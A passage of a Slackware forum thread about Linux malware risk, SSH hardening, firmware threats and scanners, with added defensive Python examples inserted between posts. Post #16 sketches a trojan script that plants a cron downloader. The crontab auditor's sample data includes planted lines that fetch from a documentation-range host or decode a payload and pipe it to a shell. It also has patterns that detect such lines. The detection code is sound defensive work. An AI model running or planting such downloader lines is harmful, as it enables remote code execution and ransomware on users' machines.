LinuxQuestions.org
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Distributions > Slackware
Slackware This Forum is for the discussion of Slackware Linux.

Old 04-07-2016, 12:44 PM   #16
OldHolborn
Member
 
Registered: Jul 2012
Posts: 229

Rep: Reputation: 190

It's a serious lack of imagination to think that, just because of the root/user separation, Linux users are immune from malware.

What about this ...

Write a FLAC-to-MP3 script in Perl, embed within it a short downloader for malware with a crontab command in it, and get it hosted/posted somewhere.

At dark o'clock in the morning it contacts the nasty disposable server and downloads the malware proper, which
1) encrypts all my files and sends the key off to far-away ransom land, or
2) reads through /var/spool/mail or scans the Thunderbird DB for email addresses and sends copies of itself, "Dude, you gotta try this..." style, or just spams them with Viagra ads.

None of this requires more than user rights.

Yes, you might be clued, but what about your granny or kid brother?
 
Old 04-07-2016, 01:39 PM   #17
enorbet
Senior Member
 
Registered: Jun 2003
Location: Virginia
Distribution: Slackware = Main OpSys
Posts: 4,784

Rep: Reputation: 4434
In a Desktop environment, it is a simple matter to prohibit remote logins (or even place it on a toggle for when you need it) which makes 99% of exploits impossible. IMHO possibly the greatest threat is that there are so few viable threats it is all too common to become complacent. I've run Samhain and TripWire in the past as well as setting iptables to monitor all connection attempts continuously on display (even by port ranges) and one by one they all fell into disuse from lack of any threat in almost 20 years. I have relied on a hardware firewall, strict control of running services, and monthly rkhunter runs for 5 years now and still have yet to log an actual threat of any kind. I do apply security patches and update browsers but have never run any anti-virus software on Slackware. For Desktop use it is simply superfluous IMHO.
 
Old 04-07-2016, 02:00 PM   #18
BratPit
Member
 
Registered: Jan 2011
Posts: 250

Rep: Reputation: 100
Quote:
Originally Posted by OldHolborn
It's a serious lack of imagination to think that, just because of the root/user separation, Linux users are immune from malware.
Yes, it's quite possible.
But if it's so easy theoretically, why is it so hard in the real world?

Maybe a FLAC-to-MP3 script in Perl is so simple that any complexity is suspicious, and it will not work simply and blindly by clicking the mouse :-)

But yes, it's a known path of potential malware propagation.
Knowledge of this is also part of security :-)
It's better than the "safest" "unknown" system behind 77 firewalls IMHO.

One question: what is /etc/cron.deny???? If you know the path.

A similar case.
In 2011, J. Rutkowska announced that there is a built-in keylogger in Linux: Xorg. Eureka.
Many years have passed and somehow no one has used this "big hole" in the perception of the Windows world.
Your cron example would make a nice way to exploit it.
Rutkowska is also a child of Windows. In that world it is unthinkable.
Knowledge learned from practice in one need not be the same in the other.

But no doubt these are some weaknesses by design. Knowledge of this gives us an advantage over the attacker, and we do not need to panic immediately.
There are many ways of neutralizing them in Linux if you're afraid. It's not Windows.

Last edited by BratPit; 04-07-2016 at 02:27 PM.
 
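The user-level cron persistence described in post #16, and the /etc/cron.deny question in post #18, as an added example that is not part of the thread. It does two things: parses a user crontab (format per crontab(5)) and flags entries that look like a downloader, and implements the crontab(1) access rule for cron.allow/cron.deny as Vixie cron documents it. The crontab text, the user lists and the 203.0.113.7 address (a TEST-NET-3 address) are constructed for the example; whether a given cron implementation honours cron.allow/cron.deny at all must be checked in its own man page, since not all of them do.

```python
import re

# Heuristics for a "downloader" job. Each pattern is paired with the reason
# reported when it matches the command part of a crontab entry.
DOWNLOADER_SIGNS = [
    (re.compile(r"\b(curl|wget)\b"),                      "fetches from the network"),
    (re.compile(r"\|\s*(ba|z|k|da)?sh\b"),                "pipes into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"),           "decodes an embedded payload"),
    (re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}"),     "raw-IP URL"),
    (re.compile(r"(^|[\s;&|(])/(tmp|var/tmp|dev/shm)/"),  "runs from a world-writable directory"),
]

# Schedule macros crontab(5) allows in place of the five time fields.
CRON_MACROS = {"@reboot", "@yearly", "@annually", "@monthly",
               "@weekly", "@daily", "@midnight", "@hourly"}

def parse_crontab(text):
    """Return [(lineno, schedule, command)] for every job line in a user
    crontab, skipping blank lines, comments and VAR=value assignments."""
    jobs = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue                      # environment setting, not a job
        is_macro = line.split()[0] in CRON_MACROS
        fields = line.split(None, 1) if is_macro else line.split(None, 5)
        if len(fields) < (2 if is_macro else 6):
            continue                      # malformed line, nothing would run
        schedule, command = " ".join(fields[:-1]), fields[-1].strip()
        jobs.append((lineno, schedule, command))
    return jobs

def audit_crontab(text):
    """Return [(lineno, schedule, command, [reasons])] for the jobs that match
    at least one downloader heuristic. Treat hits as leads, not verdicts: a
    legitimate job can pipe into sh too, so read the flagged command."""
    findings = []
    for lineno, schedule, command in parse_crontab(text):
        reasons = [why for pat, why in DOWNLOADER_SIGNS if pat.search(command)]
        if reasons:
            findings.append((lineno, schedule, command, reasons))
    return findings

def read_userlist(text):
    """One user name per line, as in /etc/cron.allow and /etc/cron.deny."""
    return {l.strip() for l in text.splitlines() if l.strip() and not l.startswith("#")}

def cron_allowed(user, allow=None, deny=None):
    """crontab(1) rule as Vixie cron documents it. `allow`/`deny` are the parsed
    contents of /etc/cron.allow and /etc/cron.deny, or None when the file does
    not exist. If cron.allow exists only listed users may use crontab; otherwise,
    if cron.deny exists, listed users may not; if neither exists the behaviour is
    a build-time choice (everyone, or only root), so that branch is an assumption."""
    if allow is not None:
        return user in allow
    if deny is not None:
        return user not in deny
    return True   # assumption: this build allows everyone when neither file exists

# Constructed crontab for user "alice": one legitimate job and two planted ones.
SAMPLE_CRONTAB = "\n".join([
    "SHELL=/bin/sh",
    "# legitimate nightly backup",
    "30 2 * * * /home/alice/bin/backup.sh",
    "# what a trojanised converter script could plant (constructed; 203.0.113.7 is TEST-NET-3)",
    "17 3 * * * curl -s http://203.0.113.7/x | sh >/dev/null 2>&1",
    "@reboot base64 -d /home/alice/.cache/.p | sh",
])

if __name__ == "__main__":
    for lineno, schedule, command, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno} [{schedule}] {command}\n    -> {', '.join(reasons)}")
    # With a constructed /etc/cron.deny listing alice, crontab(1) refuses her.
    deny = read_userlist("# users who may not use crontab\nalice\n")
    print("alice may use crontab:", cron_allowed("alice", allow=None, deny=deny))
```

On a real box, feed `audit_crontab` the spool file for each user (the directory differs between cron implementations) and the system crontabs as well; `cron.deny` stops a user from installing a job with `crontab -e`, but a job already present in the spool, or an `at` job, is outside its scope.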
Old 04-07-2016, 04:44 PM   #19
rkelsen
Senior Member
 
Registered: Sep 2004
Distribution: slackware
Posts: 4,448
Blog Entries: 7

Rep: Reputation: 2553
Quote:
Originally Posted by Skaendo
http://www.zdnet.com/article/incompe...r-ddos-botnet/

If you're running an SSH server and not using PKI, you need your head examined.

Last edited by rkelsen; 04-07-2016 at 04:45 PM.
 
2 members found this post helpful.
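Post #19's point in code, as an added example that is not from the thread: a reviewer for sshd_config text that reports the settings that leave password authentication open. Both config texts below are constructed. The parser follows the sshd_config(5) rules relied on here: keywords are case-insensitive, the first occurrence of a keyword wins, and anything after a Match line applies only to connections that match it, so it never changes the global setting. The DEFAULTS table holds upstream OpenSSH defaults for keywords that are absent (PermitRootLogin defaults to prohibit-password since 7.0; KbdInteractiveAuthentication was spelled ChallengeResponseAuthentication before 8.7); a distribution can ship different defaults, so `sshd -T` on the real host is the authoritative view, and this is for reviewing a file before deploying it.

```python
import re

# Upstream OpenSSH defaults used when a keyword is absent from the file.
# Assumption: the distribution did not change them; `sshd -T` shows the truth.
DEFAULTS = {
    "passwordauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "permitemptypasswords": "no",
    "pubkeyauthentication": "yes",
    "permitrootlogin": "prohibit-password",
}

# Acceptable values for a key-only server.
WANTED = {
    "passwordauthentication": {"no"},
    "kbdinteractiveauthentication": {"no"},   # PAM password prompts come through here
    "permitemptypasswords": {"no"},
    "pubkeyauthentication": {"yes"},
    "permitrootlogin": {"no", "prohibit-password", "without-password"},
}

# Deprecated spelling still accepted by sshd; normalise it to the current name.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}

def effective_global(text):
    """Lower-cased keyword -> value for the global section of an sshd_config.
    First occurrence wins; parsing stops at the first Match block because the
    settings in it are conditional and never the server-wide value."""
    settings = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = re.split(r"[\s=]+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip().lower()
        if key == "match":
            break
        key = ALIASES.get(key, key)
        settings.setdefault(key, value)       # first occurrence wins
    return settings

def audit_sshd_config(text):
    """Return [(keyword, effective_value, source)] for every WANTED keyword
    whose effective value is not acceptable; source tells whether the value
    came from the file or from the compiled-in default."""
    settings = effective_global(text)
    findings = []
    for key, good in WANTED.items():
        if key in settings:
            value, source = settings[key], "file"
        else:
            value, source = DEFAULTS[key], "default"
        if value not in good:
            findings.append((key, value, source))
    return findings

# Constructed: the kind of file behind the botnet article linked above.
# The second PasswordAuthentication line does nothing (first occurrence wins)
# and the setting under Match applies only to that address range.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PasswordAuthentication no
Match Address 192.0.2.0/24
    KbdInteractiveAuthentication no
"""

# Constructed: what post #19 asks for. Keys only; root only with a key.
HARDENED_CONFIG = """\
Port 22
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitEmptyPasswords no
PermitRootLogin prohibit-password
MaxAuthTries 3
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        findings = audit_sshd_config(cfg)
        print(f"{name}: {len(findings)} finding(s)")
        for key, value, source in findings:
            print(f"  {key} = {value} ({source}); wanted one of {sorted(WANTED[key])}")
```

The weak file shows the two mistakes that survive a casual read: a hardening line added below an existing one is silently ignored, and a line placed after a Match header only hardens that match. Turning off PasswordAuthentication alone is not enough when sshd is built with PAM, which is why KbdInteractiveAuthentication is on the list.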
Old 04-08-2016, 05:59 AM   #20
ReaperX7
LQ Guru
 
Registered: Jul 2011
Location: California
Distribution: Slackware64-15.0 Multilib
Posts: 6,558
Blog Entries: 15

Rep: Reputation: 2097
PEBCAK is often the biggest source of idiocy. When in doubt, just add a layer of security and use common sense. Even if it seems meaningless, you never know.
 
Old 04-08-2016, 06:22 AM   #21
nickmartin42
LQ Newbie
 
Registered: Mar 2016
Posts: 13

Rep: Reputation: 1
To give your Linux server the best security, so as to secure it from virus/malware attack, one should go for a Linux firewall that features all of the security and provides centralized network access control from the administrator's side.
 
Old 04-08-2016, 09:36 AM   #22
BratPit
Member
 
Registered: Jan 2011
Posts: 250

Rep: Reputation: 100
By the way.

Malware has gone beyond the OSes.

https://www.youtube.com/watch?v=rcwn...&nohtml5=False

Last edited by BratPit; 04-08-2016 at 10:24 AM.
 
Old 04-08-2016, 07:17 PM   #23
ReaperX7
LQ Guru
 
Registered: Jul 2011
Location: California
Distribution: Slackware64-15.0 Multilib
Posts: 6,558
Blog Entries: 15

Rep: Reputation: 2097
If memory serves, some of the malware aimed at Macs targeted not just the OS, but the firmware.
 
Old 04-11-2016, 02:01 AM   #24
enorbet
Senior Member
 
Registered: Jun 2003
Location: Virginia
Distribution: Slackware = Main OpSys
Posts: 4,784

Rep: Reputation: 4434
Quote:
Originally Posted by BratPit
By the way.

Malware has gone beyond the OSes.

https://www.youtube.com/watch?v=rcwn...&nohtml5=False
Thank you for the link. She truly has a unique and proper perspective regarding security. I was aware that UEFI was a sorely needed improvement over BIOS, if only in size to improve capability, but shockingly superficial in implementation so far; now I see why.... Intel ME and its Master Plan to give embedded proprietary hardware the upper hand (arms, shoulders, legs and feet) which, as Joanna pointed out, wouldn't be too bad if the User/Owner (I hesitated typing "Owner" since that may become moot and/or meaningless) were given the sort of control that could coexist with "proprietary" but create at least a truly trustworthy system, free of user data mining and the backdoors to use it.

Her talk made me look up the Lenovo X60s to see if I could live with the power limitations to get improved security at the hardware layer, and they're so cheap I'm going to get one to play with and see for myself. On paper, it looks like some versions can work just fine for several years yet. With an SSD or a 7200 rpm HDD, the 2-core CPU at almost 2 GHz and 4 GB RAM, it looks like the Intel GMA 950 is the only moderately weak spot, and even that is capable of 2048x1536. Lenovo X60 Detailed Specs. Thank you Microsoft! Surely did drive that price down LOL.
 
Old 04-11-2016, 03:22 AM   #25
astrogeek
Moderator
 
Registered: Oct 2008
Distribution: Slackware [64]-X.{0|1|2|37|-current} ::12<=X<=15, FreeBSD_12{.0|.1}
Posts: 6,263
Blog Entries: 24

Rep: Reputation: 4194
Quote:
Originally Posted by BratPit
By the way.

Malware has gone beyond the OSes.

https://www.youtube.com/watch?v=rcwn...&nohtml5=False
Yes, I'll also say thanks for the link. A very interesting presentation.

I had heard of ME but had no idea what it actually is! All my old, recycled hardware is looking very good indeed!

With acceptance of ME in the CPU and the ubiquitous man-in-the-middle on the net (CloudFlare), it is a cruel joke to talk seriously about digital privacy and security.

Last edited by astrogeek; 04-11-2016 at 03:26 AM.
 
Old 04-11-2016, 04:32 AM   #26
drgibbon
Senior Member
 
Registered: Nov 2014
Distribution: Slackware64 15.0
Posts: 1,220

Rep: Reputation: 942
Quote:
Originally Posted by astrogeek
I had heard of ME but had no idea what it actually is! All my old, recycled hardware is looking very good indeed!
Minifree sell ThinkPad refurbs with the Intel ME disabled and coreboot preinstalled. Be aware however that if you're interested in Qubes OS, the Minifree ThinkPads don't have IOMMU for network VM isolation (as far as I know). Slackware 14.1 runs just nicely on my X200 though.

Disclaimer: please don't tell me that the laptops are old and decrepit, I don't care, these are some of the only laptops certified by the FSF and I'm just posting it for those that are interested.
 
Old 04-11-2016, 05:51 AM   #27
lemonade
Member
 
Registered: Oct 2015
Posts: 40

Rep: Reputation: Disabled
AVG has a version for Linux and it installs as a daemon too.

I mention it because for Windows, for me, AVG is the safe option. And we could say they do have very up-to-date databases.

On the other hand, I don't remember it having a GUI, just the daemon and several command-line programs.
 
Old 04-11-2016, 05:56 AM   #28
Noryungi
Member
 
Registered: Jul 2003
Location: --> X <-- You are here.
Distribution: Slackware, OpenBSD
Posts: 305

Rep: Reputation: 53
What I use on my machine (Internet facing, SSH-only server):

* OSSEC for intrusion/binary modification detection
* DenyHosts to protect from OpenSSH abuse
* ClamAV to scan downloaded files (and only downloaded files)
* Both chkrootkit (with personal patches) and rkhunter to check for potential rootkits

All of these are updated on a daily basis.

All firewall duties are delegated to my ADSL router.

I also scan my machine from the Internet from time to time to make sure nothing untoward has appeared.

I update my machine religiously and check for updates daily as well.
 
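The OpenSSH-abuse part of post #28's setup, as an added example that is not from the thread and not DenyHosts' own code: the same idea reduced to a tally of sshd failures per source address with separate thresholds for invalid users, valid users and root (what DenyHosts' DENY_THRESHOLD_INVALID, DENY_THRESHOLD_VALID and DENY_THRESHOLD_ROOT settings do), plus the iptables rules that would drop the offenders, which is the software-firewall layer post #30 asks about. The log lines are constructed in the format OpenSSH writes through syslog; the threshold values, host name and addresses (RFC 5737 documentation ranges) are assumptions for the example, and the rules are returned as strings rather than executed.

```python
import re
from collections import Counter, defaultdict

# OpenSSH authentication failure as written through syslog, e.g.
#   sshd[2345]: Failed password for invalid user admin from 198.51.100.23 port 51432 ssh2
FAILED = re.compile(
    r"sshd\[\d+\]: Failed (?:password|keyboard-interactive/pam|publickey) for "
    r"(?P<invalid>invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

# Assumed thresholds, in the spirit of DenyHosts' DENY_THRESHOLD_INVALID /
# _VALID / _ROOT: guessing account names is blocked fast, a real user gets
# more slack for typos, and a single failed root login is enough.
THRESHOLDS = {"invalid": 3, "valid": 10, "root": 1}

def tally(lines):
    """ip -> Counter of failures by class ('invalid', 'valid', 'root').
    Successful logins and unrelated lines are ignored."""
    per_ip = defaultdict(Counter)
    for line in lines:
        m = FAILED.search(line)
        if not m:
            continue
        if m.group("invalid"):
            kind = "invalid"            # account does not exist on this host
        elif m.group("user") == "root":
            kind = "root"
        else:
            kind = "valid"              # real account, wrong credential
        per_ip[m.group("ip")][kind] += 1
    return per_ip

def offenders(lines, thresholds=THRESHOLDS):
    """ip -> sorted list of the classes whose threshold the address reached."""
    hits = {}
    for ip, counts in tally(lines).items():
        over = sorted(k for k, limit in thresholds.items() if counts[k] >= limit)
        if over:
            hits[ip] = over
    return hits

def block_rules(offending_ips, chain="INPUT"):
    """iptables commands (as strings, not executed) that drop the offenders.
    Insert rather than append so they land ahead of any accept rule."""
    return [f"iptables -I {chain} -s {ip} -j DROP" for ip in sorted(offending_ips)]

# Constructed log excerpt: one scanning host cycling through common account
# names and then root, one legitimate user mistyping a passphrase before a
# key login succeeds, and one lone root attempt from a third address.
SAMPLE_LOG = [
    "Apr  7 03:14:15 slack sshd[2345]: Failed password for invalid user admin from 198.51.100.23 port 51432 ssh2",
    "Apr  7 03:14:16 slack sshd[2346]: Failed password for invalid user oracle from 198.51.100.23 port 51433 ssh2",
    "Apr  7 03:14:17 slack sshd[2347]: Failed password for invalid user test from 198.51.100.23 port 51434 ssh2",
    "Apr  7 03:14:18 slack sshd[2348]: Failed password for invalid user pi from 198.51.100.23 port 51435 ssh2",
    "Apr  7 03:14:19 slack sshd[2349]: Failed password for invalid user ubnt from 198.51.100.23 port 51436 ssh2",
    "Apr  7 03:14:21 slack sshd[2350]: Failed password for root from 198.51.100.23 port 51440 ssh2",
    "Apr  7 03:20:01 slack sshd[2400]: Failed password for alice from 192.0.2.10 port 40022 ssh2",
    "Apr  7 03:20:04 slack sshd[2400]: Failed password for alice from 192.0.2.10 port 40022 ssh2",
    "Apr  7 03:20:09 slack sshd[2401]: Accepted publickey for alice from 192.0.2.10 port 40023 ssh2: ED25519 SHA256:constructed",
    "Apr  7 03:22:00 slack sshd[2410]: Failed password for root from 203.0.113.5 port 2222 ssh2",
]

if __name__ == "__main__":
    for ip, counts in sorted(tally(SAMPLE_LOG).items()):
        print(ip, dict(counts))
    bad = offenders(SAMPLE_LOG)
    for ip, why in sorted(bad.items()):
        print(f"block {ip}: threshold reached for {', '.join(why)}")
    print("\n".join(block_rules(bad)))
```

Two cautions a practitioner would add: a whitelist for your own addresses goes in front of any such blocker, or a mistyped passphrase locks you out of your own box; and with PasswordAuthentication off, the "Failed password" lines stop appearing altogether, so on a key-only server the tally mostly confirms that the scanners are still knocking.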
Old 04-11-2016, 06:05 AM   #29
Gordie
Member
 
Registered: Aug 2007
Location: Nolalu, Ontario, Canada
Distribution: Slackware64-Current
Posts: 871

Rep: Reputation: 364
AVG no longer offers a Linux version. Windows, Mac and Android only these days.
 
Old 04-11-2016, 07:14 AM   #30
hitest
Guru
 
Registered: Mar 2004
Location: Canada
Distribution: Void, Debian, Slackware
Posts: 7,342

Rep: Reputation: 3746
Quote:
Originally Posted by Noryungi
All firewall duties are delegated to my ADSL router.
Do you run a software firewall on your PC? Some NAT routers are vulnerable to attacks.
 
  


All times are GMT -5.
